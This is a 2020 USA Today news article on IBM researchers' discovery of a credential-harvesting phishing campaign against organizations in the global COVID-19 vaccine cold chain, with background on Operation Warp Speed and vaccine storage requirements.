IBM researchers have detected a global phishing campaign targeting organizations associated with an overseas supply chain used for vaccine distribution.
The company said spoofed emails impersonating a Chinese biomedical executive targeted organizations in six countries, including Germany, Italy, South Korea, the Czech Republic and Taiwan.
The organizations, which included a European Commission office, are believed to be “providers of material support to meet transportation needs within the COVID-19 cold chain,” the analysts wrote in a post to be published Thursday.
Vaccines, including those under review for COVID-19, must be kept cool and sometimes frozen during distribution, and the Chinese company whose executive was impersonated is a supplier of low-temperature equipment.
“We assess that the purpose of this COVID-19 phishing campaign may have been to harvest credentials, possibly to gain future unauthorized access to corporate networks and sensitive information relating to the COVID-19 vaccine distribution,” the analysts, Melissa Frydrych and Claire Zaboeva, wrote.
Frydrych and Zaboeva said they could not determine if the campaign was successful or who was behind it but said the “precision targeting of executives and key global organizations hold the potential hallmarks of nation-state tradecraft.”
What country would have an interest in disrupting the transportation of COVID-19 vaccine to poorer nations was not clear. The cold-chain suppliers could simply be a tempting target for nationally-backed criminal cyber groups to use to make money by selling data or a more nefarious desire to disrupt what will be a vital part of ending the pandemic across much of the globe.
IBM said it notified US authorities about its findings, and that federal cybersecurity officials are encouraging companies involved in distributing vaccines in the United States to be on guard.
Operation Warp Speed distributing vaccines in United States
In the United States, development and distribution of COVID-19 vaccines is being overseen by health and military officials involved in Operation Warp Speed. The operation is relying on a proprietary software program called Tiberius and a “‘whole of government’ approach to ensure the security of the vaccine supply chain, including delivery to administration points,” officials have said.
Two vaccines have applied for emergency use authorization from the FDA in the United States. One made by Moderna can be stored at regular refrigerator temperatures for 30 days and is able to be held at room temperature for up to 12 hours. But the vaccine from Pfizer and German collaborator BioNTech must be stored at between minus 112 degrees and minus 94 degrees, requiring ultracold cooling equipment during shipping and distribution.
The organizations targeted in the overseas phishing campaign are believed to be affiliated with Gavi, an international vaccine alliance dedicated to inoculating children in the poorest countries. The alliance works with UNICEF, the World Health Organization, the World Bank and others.
The IBM researchers said organizations who received the spoofed emails are in the energy, manufacturing, website creation and software and internet security industries. They are believed to be involved with a project known as the Cold Chain Equipment Optimization Platform, a $400 million effort to upgrade low-temperature supply chains in 56 countries.
The emails posed as requests for price quotes and contained HTML attachments that, when opened, required recipients to enter credentials to view them.
“The CCEOP initiative is naturally accelerating efforts to facilitate the distribution of a COVID-19 vaccine. A breach within any part of this global alliance could result in the exposure of numerous partner computing environments worldwide,” the IBM researchers warn.
IBM has a cyber threat detection division that earlier this year uncovered activity targeting a global supply chain of personal protective gear.
In October, federal officials warned that ransomware attacks had targeted U.S. hospitals and urged healthcare providers to “ensure that they take timely and reasonable precautions to protect their networks from these threats.”
(c) 2020 USA Today
Distributed by Tribune Content Agency, LLC